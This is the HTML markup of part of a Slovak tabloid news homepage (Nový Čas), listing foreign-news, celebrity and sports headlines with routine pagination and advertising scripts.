                    title="Orbán si stojí za svojím: Ochrana klímy je dôležitá, ale nemali by ju platiť maďarské rodiny">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3303557.jpg/viktor-orban.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3303557.jpg/viktor-orban.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3303557.jpg/viktor-orban.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3303557.jpg/viktor-orban.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3303557.jpg/viktor-orban.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:53&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-6-nadpis"
                            href="/clanok/2533993/orban-si-stoji-za-svojim-ochrana-klimy-je-dolezita-ale-nemali-by-ju-platit-madarske-rodiny/"
                            title="Orbán si stojí za svojím: Ochrana klímy je dôležitá, ale nemali by ju platiť maďarské rodiny">Orbán si stojí za svojím: Ochrana klímy je dôležitá, ale nemali by ju platiť maďarské rodiny                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-6-nadpis"
                            href="/clanok/2533993/orban-si-stoji-za-svojim-ochrana-klimy-je-dolezita-ale-nemali-by-ju-platit-madarske-rodiny/"
                            title="Orbán si stojí za svojím: Ochrana klímy je dôležitá, ale nemali by ju platiť maďarské rodiny">Orbán si stojí za svojím: Ochrana klímy je dôležitá, ale nemali by ju platiť maďarské rodiny                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533991/udalosti-v-africkom-state-mali-naberaju-na-obratkach-slova-o-statnom-prevrate/"
                    data-event="clanok|box-nekonecne-spravy|clanok-7-obrazok"
                    title="Udalosti v africkom štáte Mali naberajú na obrátkach: Slová o štátnom prevrate">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321871.jpg/mali.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321871.jpg/mali.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321871.jpg/mali.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321871.jpg/mali.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321871.jpg/mali.jpg"></noscript>    <div class="flags"><span class="flag">Foto</span>    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:52&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-7-nadpis"
                            href="/clanok/2533991/udalosti-v-africkom-state-mali-naberaju-na-obratkach-slova-o-statnom-prevrate/"
                            title="Udalosti v africkom štáte Mali naberajú na obrátkach: Slová o štátnom prevrate">Udalosti v africkom štáte Mali naberajú na obrátkach: Slová o štátnom prevrate                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-7-nadpis"
                            href="/clanok/2533991/udalosti-v-africkom-state-mali-naberaju-na-obratkach-slova-o-statnom-prevrate/"
                            title="Udalosti v africkom štáte Mali naberajú na obrátkach: Slová o štátnom prevrate">Udalosti v africkom štáte Mali naberajú na obrátkach: Slová o štátnom prevrate                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533943/kate-to-spravila-znova-ukazala-sa-s-williamom-a-vsetkym-to-udrelo-do-oci-to-nie-je-nahoda/"
                    data-event="clanok|box-nekonecne-spravy|clanok-8-obrazok"
                    title="Kate to spravila znova! Ukázala sa s Williamom a všetkým to udrelo do očí: To nie je náhoda">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321773.jpg/vojvodkyna-kate-kate-middleton-vojvodkyna-z-cambridge.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321773.jpg/vojvodkyna-kate-kate-middleton-vojvodkyna-z-cambridge.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321773.jpg/vojvodkyna-kate-kate-middleton-vojvodkyna-z-cambridge.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321773.jpg/vojvodkyna-kate-kate-middleton-vojvodkyna-z-cambridge.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321773.jpg/vojvodkyna-kate-kate-middleton-vojvodkyna-z-cambridge.jpg"></noscript>    <div class="flags"><span class="flag">Foto</span>    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:40&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/prominenti/prominenti-zahranicni/" title="Zahraniční prominenti">Zahraniční prominenti                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-8-nadpis"
                            href="/clanok/2533943/kate-to-spravila-znova-ukazala-sa-s-williamom-a-vsetkym-to-udrelo-do-oci-to-nie-je-nahoda/"
                            title="Kate to spravila znova! Ukázala sa s Williamom a všetkým to udrelo do očí: To nie je náhoda">Kate to spravila znova! Ukázala sa s Williamom a všetkým to udrelo do očí: To nie je náhoda                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-8-nadpis"
                            href="/clanok/2533943/kate-to-spravila-znova-ukazala-sa-s-williamom-a-vsetkym-to-udrelo-do-oci-to-nie-je-nahoda/"
                            title="Kate to spravila znova! Ukázala sa s Williamom a všetkým to udrelo do očí: To nie je náhoda">Kate to spravila znova! Ukázala sa s Williamom a všetkým to udrelo do očí: To nie je náhoda                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533983/ockovanie-deti-od-12-rokov-je-v-cesku-na-spadnutie-babis-caka-uz-len-na-jedinu-vec/"
                    data-event="clanok|box-nekonecne-spravy|clanok-9-obrazok"
                    title="Očkovanie detí od 12 rokov je v Česku na spadnutie: Babiš čaká už len na jedinú vec">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3317059.jpg/babis-andrej-babis.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3317059.jpg/babis-andrej-babis.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3317059.jpg/babis-andrej-babis.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3317059.jpg/babis-andrej-babis.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3317059.jpg/babis-andrej-babis.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:32&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-9-nadpis"
                            href="/clanok/2533983/ockovanie-deti-od-12-rokov-je-v-cesku-na-spadnutie-babis-caka-uz-len-na-jedinu-vec/"
                            title="Očkovanie detí od 12 rokov je v Česku na spadnutie: Babiš čaká už len na jedinú vec">Očkovanie detí od 12 rokov je v Česku na spadnutie: Babiš čaká už len na jedinú vec                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-9-nadpis"
                            href="/clanok/2533983/ockovanie-deti-od-12-rokov-je-v-cesku-na-spadnutie-babis-caka-uz-len-na-jedinu-vec/"
                            title="Očkovanie detí od 12 rokov je v Česku na spadnutie: Babiš čaká už len na jedinú vec">Očkovanie detí od 12 rokov je v Česku na spadnutie: Babiš čaká už len na jedinú vec                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533985/weiss-ml-tuzi-aj-po-tretej-ucasti-na-vrcholnom-turnaji-som-pripraveny-zabojovat-o-miestenku/"
                    data-event="clanok|box-nekonecne-spravy|clanok-10-obrazok"
                    title="Weiss ml. túži aj po tretej účasti na vrcholnom turnaji: Som pripravený zabojovať o miestenku">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321853.jpg/futbal-weiss.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321853.jpg/futbal-weiss.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321853.jpg/futbal-weiss.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321853.jpg/futbal-weiss.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321853.jpg/futbal-weiss.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:28&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/futbal/" title="Futbal">Futbal                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-10-nadpis"
                            href="/clanok/2533985/weiss-ml-tuzi-aj-po-tretej-ucasti-na-vrcholnom-turnaji-som-pripraveny-zabojovat-o-miestenku/"
                            title="Weiss ml. túži aj po tretej účasti na vrcholnom turnaji: Som pripravený zabojovať o miestenku">Weiss ml. túži aj po tretej účasti na vrcholnom turnaji: Som pripravený zabojovať o miestenku                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-10-nadpis"
                            href="/clanok/2533985/weiss-ml-tuzi-aj-po-tretej-ucasti-na-vrcholnom-turnaji-som-pripraveny-zabojovat-o-miestenku/"
                            title="Weiss ml. túži aj po tretej účasti na vrcholnom turnaji: Som pripravený zabojovať o miestenku">Weiss ml. túži aj po tretej účasti na vrcholnom turnaji: Som pripravený zabojovať o miestenku                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533981/zadrzanie-novinara-pratasevica-bezpecnostna-rada-osn-zacala-konat/"
                    data-event="clanok|box-nekonecne-spravy|clanok-11-obrazok"
                    title="Zadržanie novinára Prataseviča: Bezpečnostná rada OSN začala konať">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321843.jpg/lietadlo-bielorusko-zadrzanie-novinar-raman-pratasevic.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321843.jpg/lietadlo-bielorusko-zadrzanie-novinar-raman-pratasevic.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321843.jpg/lietadlo-bielorusko-zadrzanie-novinar-raman-pratasevic.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321843.jpg/lietadlo-bielorusko-zadrzanie-novinar-raman-pratasevic.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321843.jpg/lietadlo-bielorusko-zadrzanie-novinar-raman-pratasevic.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:27&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/zahranicne-spravy/" title="Zahraničné správy">Zahraničné správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-11-nadpis"
                            href="/clanok/2533981/zadrzanie-novinara-pratasevica-bezpecnostna-rada-osn-zacala-konat/"
                            title="Zadržanie novinára Prataseviča: Bezpečnostná rada OSN začala konať">Zadržanie novinára Prataseviča: Bezpečnostná rada OSN začala konať                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-11-nadpis"
                            href="/clanok/2533981/zadrzanie-novinara-pratasevica-bezpecnostna-rada-osn-zacala-konat/"
                            title="Zadržanie novinára Prataseviča: Bezpečnostná rada OSN začala konať">Zadržanie novinára Prataseviča: Bezpečnostná rada OSN začala konať                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533901/daniel-fischer-v-najtrapnejsej-situacii-so-zenou-snad-takto-nebalil-kavaschovu/"
                    data-event="clanok|box-nekonecne-spravy|clanok-12-obrazok"
                    title="Daniel Fischer v najtrápnejšej situácii so ženou: Snáď takto nebalil Kavaschovú">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321693.jpg/daniel-fischer.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321693.jpg/daniel-fischer.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321693.jpg/daniel-fischer.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321693.jpg/daniel-fischer.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321693.jpg/daniel-fischer.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:15&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/prominenti/prominenti-domaci/" title="Domáci Prominenti">Domáci Prominenti                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-12-nadpis"
                            href="/clanok/2533901/daniel-fischer-v-najtrapnejsej-situacii-so-zenou-snad-takto-nebalil-kavaschovu/"
                            title="Daniel Fischer v najtrápnejšej situácii so ženou: Snáď takto nebalil Kavaschovú">Daniel Fischer v najtrápnejšej situácii so ženou: Snáď takto nebalil Kavaschovú                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-12-nadpis"
                            href="/clanok/2533901/daniel-fischer-v-najtrapnejsej-situacii-so-zenou-snad-takto-nebalil-kavaschovu/"
                            title="Daniel Fischer v najtrápnejšej situácii so ženou: Snáď takto nebalil Kavaschovú">Daniel Fischer v najtrápnejšej situácii so ženou: Snáď takto nebalil Kavaschovú                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
    </div>

    <div class="hp-bottom-list-more-button-wrapper">
        <button data-page="1" class="hp-bottom-list-more-button transparent-button dark-font" id="button_get_list">Ďalšie správy</button>
    </div>

</div>

<script type="text/javascript">

    var get_articles_from = 1;

    document.getElementById('button_get_list').onclick=function(){get_list(get_articles_from++);};

    function get_list(from) {
        var $btn = $('#button_get_list');
        $btn.attr('disabled', true);

        let orig_text = $btn.html();
        $btn.html('Načítavam');
        $btn.css('filter','opacity(0.5)')
        $btn.css('cursor','not-allowed');

        var url = '/ajax/get_article_list/'+from+'?limit=12';

        $.get(url, function(d){
            if (d) {
                $('#article_list').append(d);
                if (d.match(/<!-- \.smallPost -->/g).length < 12) {
                    $btn.fadeOut(500);
                } else {
                    $btn.attr('disabled', false);
                    $btn.html(orig_text);
                    $btn.css('filter', '');
                    $btn.css('cursor', '');
                }
            }
        });
    }
</script>
        </div>
    </section>
    <section class="side-section xs-hidden sm-hidden">
        <div class="iframe-banner-desktop"><div class="rs-advertisement rs-advertisement-cas-desktop-hp-mid3"><!-- Reklamna plocha cas-desktop-hp-mid3 -->
  <div id='mid3' style="border: 0pt none; display: inline-block;">
    <script>
      googletag.cmd.push(function() { googletag.display('mid3'); });
    </script>
  </div>
</div>        </div>
        <div class="floating-square-scrolling"><!--
<div class="floating-square-scrolling" style="top: 0px; position: relative;">
  <div class="rs-advertisement rs-advertisement-cas-desktop-ak-scrolling">
    <div id='other4'>
      <script>
        googletag.cmd.push(function() { googletag.display('other4'); });
      </script>
    </div>
  </div>
</div>
<script style="">$('.floating-square-scrolling').floating({ wrapper: '#article-list', offsetTop: 35 });</script>
-->

<div class="rs-advertisement rs-advertisement-cas-desktop-square-scrolling pl-md-10">
  <!-- Reklamna plocha cas-desktop-square-scrolling -->
    <div id='other4' style="max-height:600px; width:300px;margin-top:20px;box-sizing: border-box;">
      <script>
        googletag.cmd.push(function() { googletag.display('other4'); });
      </script>
    </div>     
</div>
        </div>
        <script>$('.floating-square-scrolling').floating({ wrapper: '#article-list', offsetTop: 35 });</script>
    </section>
</div>
<section><div class="rs-advertisement rs-advertisement-cas-desktop-screen-bottom">
  <!-- Reklamna plocha cas-desktop-screen-bottom -->
  <div id="div-gpt-ad-cas-desktop-screen-bottom" style="box-sizing: border-box;text-align: center;" data-google-query-id="CM7r9NXmyegCFQShewodeyYHhw">
    <div id='other1'>
      <script>
        googletag.cmd.push(function() { googletag.display('other1'); });
      </script>
    </div>
  </div>
</div></section>
				</div>
				<div class="rs-advertisement rs-advertisement-cas-desktop-screen-bottom">				</div>
			</div>
		</div>
		<!-- Footer --><style>
    @import url("https://cdn.cas.sk/cas/css/YXBpfGRlZmF1bHR8YWxsfGF6ZXRCdXR0b258fDAtMHxkM2IxMTZmNTlhOTdmN2RhZmJmNGE5NGQyNDgxNTVmMQ==.css?v=3");
</style>
<script type="text/javascript">
    /**
     * SlideMenu fix
     * #63663
     */
    (function () {
        var d = document;
        function transitionEndEvent() {
            var el = d.createElement('div'),
                transitions = {
                    'transition': 'transitionend',
                    'OTransition': 'otransitionend',
                    'MozTransition': 'transitionend',
                    'WebkitTransition': 'webkitTransitionEnd'
                };
            for (var i in transitions) {
                if (transitions.hasOwnProperty(i) && typeof el.style[i] !== 'undefined') {
                    return transitions[i];
                }
            }
        }
        var transitionEnd = transitionEndEvent();
        var page = d.querySelector("#page");
        var slide = d.querySelector("#slide-menu");
        var burger = d.querySelector("#side-menu-main-menu-toggler");
        var container = $(".page-container");
        page.addEventListener(transitionEnd, function () {
            if ($(d).width() > 479) {
                return;
            }
            if (slide.style.display === 'block') {
                container.hide();
            }
        }, false);
        if (burger) {
            burger.addEventListener("click", function () {
                container.show();
            });
        }
    })();
</script>

<section class="small-footer">
    <div class="small-footer-left-wrapper">
        <div class="small-footer-tip-text">
            <div class="tip-text">Chcete sa s celým Slovenskom podeliť o pikantnú informáciu či kurióznu skúsenosť?
                Sme tu pre vás!
            </div>
            <a data-event="clanok|paticka|poslat-tip" class="transparent-button"
                href="/tipredakcii/" title="Poslať TIP na článok">
                Poslať TIP na článok
            </a>
        </div>
        <div class="small-footer-tip">
            <div class="tip">
                <div class="footer-title">
                    <div class="cas-color-font">Máte tip</div>
                    na článok?
                </div>
                <div class="logo">
                    <img src="https://cdn.cas.sk/cas/img/igon-tipodvas.png" title="Máte tip na článok? | Nový Čas"
                        alt="Máte tip na článok?">
                </div>
                <div class="cb"></div>
            </div>
        </div>
    </div>
    <div class="small-footer-right-wrapper">
        <div class="best-news-wrapper">
            <div class="cas-color-font">
                Najlepšie bulvárne spravodajstvo<br>
                <span class="text-white">do vášho zariadenia</span>
            </div>
        </div>
        <div class="novy-cas-apps ml20">
            <div class="text">
                Stiahnite si aplikáciu pre váš pc, notebook, tablet, iPad, android a prezerajte si naše noviny a
                časopisy kedykoľvek.
            </div>
            <div class="apps-icons">
                <a data-event="clanok|paticka|google-play" class="icon google-play-icon"
                    href="https://play.google.com/store/apps/details?id=sk.cas.android.app"
                    title="Stiahnite si aplikáciu z Google play | Nový Čas">
                    <img src="https://cdn.cas.sk/cas/img/svg/icon_googleplay.svg"
                        title="Stiahnite si aplikáciu z Google play | Nový Čas"
                        alt="Stiahnite si aplikáciu z Google play">
                </a>
                <a data-event="clanok|paticka|app-store" class="icon"
                    href="https://itunes.apple.com/sk/app/novy-cas.sk/id804072747?mt=8"
                    title="Stiahnite si aplikáciu z App Store | Nový Čas">
                    <img src="https://cdn.cas.sk/cas/img/svg/icon_appstore.svg" alt="Stiahnite si aplikáciu z App Store"
                        title="Stiahnite si aplikáciu z App Store | Nový Čas">
                </a>
            </div>
        </div>
    </div>
</section>
<section class="footer-bottom">

    <div class="socials">
        <a data-event="clanok|paticka|facebook" href="https://www.facebook.com/novycas"
            title="Nový Čas na facebooku">
            <img src="https://cdn.cas.sk/cas/img/svg/icon_fb.svg" title="Nový Čas na facebooku"
                alt="Nový Čas na facebooku">
            <span>Nový Čas na facebooku</span>
        </a>

        <a data-event="clanok|paticka|twitter" href="https://twitter.com/novycassk"
            title="Nový Čas na twitteri">
            <img src="https://cdn.cas.sk/cas/img/svg/icon_tweet.svg" title="Nový Čas na twitteri"
                alt="Nový Čas na twitteri">
            <span>Nový Čas na twitteri</span>
        </a>

        <a data-event="clanok|paticka|google-plus" href="https://www.instagram.com/novycas/"
            title="Nový Čas na instagrame">
            <img src="https://cdn.cas.sk/cas/img/svg/icon_instagram.svg" title="Nový Čas na instagrame"
                alt="Nový Čas na instagrame">
            <span>Nový Čas na instagrame</span>
        </a>
    </div>

    <div class="about">
        <span class="hidden lg-visible md-visible">
            <a data-event="clanok|paticka|redakcia" href="/redakcia/#redakcia"
                title="Redakcia">Redakcia</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|inzercia" href="/redakcia/#inzercia"
                title="Inzercia">Inzercia</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|marketing" href="/redakcia/#marketing"
                title="Marketing">Marketing</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|rss" href="/rss/" title="Rss">Rss</a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|cookie" href="/clanok/728517/zasady/"
                title="Cookie">
                Cookie
            </a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|pravidla"
                href="/clanok/729650/vseobecne-podmienky-pre-servery-prevadzkovane-spolocnostou-novy-cas-a-s/"
                title="Pravidlá">
                Pravidlá
            </a>
            <span class="separator">|</span>
            <a data-event="clanok|paticka|gdpr" href="/clanok/731794/gdpr/"
                title="Gdpr">GDPR</a>
        </span>

        <div class="hidden sm-visible xs-visible about-menu">
            <div class="mobile-section-menu" id="5daff50c40887">
                <div class="mobile-section-menu-wrapper">
                    <select>
                        <option value="/kontakty#redakcia">Redakcia</option>
                        <option value="/kontakty#inzercia">Inzercia</option>
                        <option value="/kontakty#marketing">Marketing</option>
                        <option value="/rss/">Rss</option>
                        <option value="/clanok/728517/zasady/">Podmienky</option>
                    </select>
                    <span class="mobile-section-menu-button">O nás</span>
                </div>
            </div>

            <script>
                $(function () {
                    $('#5daff50c40887 select').change(function () {
                        var href = $(this).val();
                        if (href != '') {
                            location.href = href;
                        }
                    });
                });
            </script>
        </div>

        <span class="copyright">
            © FPD Media, a.s. Autorské práva sú vyhradené a vykonáva ich prevádzkovateľ portálu. Spravodajská
            licencia vyhradená.
        </span>
    </div>
</section>
		<!-- Footer end --><script type="text/javascript">
        $(() => {
            if (window.innerWidth < 1024) {
                let strossle = $(".rs-advertisement-strossle-widget").first();
                $(".article-bottom.xs-visible .row.bordered").prepend(strossle);
            }
        });
    </script><script>
$("#m_mid2").css("text-align", "center").css("width", "100%").css("padding","10px 0");
</script>
<style>
div#videoad {
    margin: 10px auto;
    text-align: center;
}
.side-section iframe[id*='google_ads_iframe'], .side-section iframe[id*='adf'] {margin: 20px 0 0 0 !important;}
</style><!-- //Connect Container: Cas.sk-->
<script src="//get.s-onetag.com/1af21222-9b7c-4723-ba13-3960cd2ff455/tag.min.js" async defer></script>			<script type="text/javascript">
				$(function () {
					if (typeof __cas.handleTiviPlayerResize !== 'undefined') {
						__cas.handleTiviPlayerResize();
					}
				});
			</script>

			<script type="text/javascript">
				$(function () {
					if (typeof __cas.handleEmbedResize !== 'undefined') {
						__cas.handleEmbedResize();
					}
				});
			</script>	</body>

</html>

<!-- ZCHECK OK 88ms www-cas-frontend-12 db-cas/db-cas-slave-1 -->
<!-- ZCHECK OK 88ms www-cas-frontend-12 db-cas/db-cas-slave-1 -->